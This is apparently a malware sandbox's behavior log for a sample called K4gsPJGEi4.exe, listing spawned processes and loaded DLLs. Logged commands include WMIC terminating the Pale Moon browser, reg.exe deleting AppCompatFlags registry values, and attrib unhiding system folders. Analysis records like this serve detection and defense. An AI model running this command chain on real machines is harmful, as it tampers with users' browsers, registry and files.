Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
